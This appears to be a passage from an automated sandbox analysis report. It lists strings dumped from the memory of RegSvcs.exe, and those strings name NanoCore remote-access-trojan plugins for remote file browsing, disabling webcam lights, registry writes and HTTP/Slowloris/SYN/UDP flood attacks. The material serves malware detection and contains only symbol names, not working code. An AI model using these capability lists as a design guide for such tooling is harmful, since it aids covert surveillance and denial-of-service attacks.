<Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691776738.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: RegSvcs.exe, 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThrea